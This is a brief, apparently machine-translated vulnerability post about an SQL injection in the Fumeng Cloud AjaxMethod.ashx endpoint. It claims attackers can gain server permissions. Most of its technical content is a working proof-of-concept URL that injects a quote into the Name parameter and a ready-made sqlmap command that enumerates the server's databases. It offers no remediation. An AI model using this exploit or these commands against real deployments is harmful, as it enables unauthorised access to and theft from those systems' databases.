Fumeng Cloud Ajaxmethod Ashx Sql Injection Vulnerability
Fumeng Cloud Ajaxmethod Ashx Sql Injection Vulnerability
Fumeng Cloud AjaxMethod.ashx SQL injection vulnerability
Vulnerability Description
Fumeng Cloud AjaxMethod.ashx file has a SQL injection vulnerability, and an attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
Fumeng Cloud
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
https://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27
Using Sqlmap
sqlmap -u "https://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y" -p Name --batch --random-agent --dbms mssql --dbs
This post is licensed under CC BY 4.0 by the author.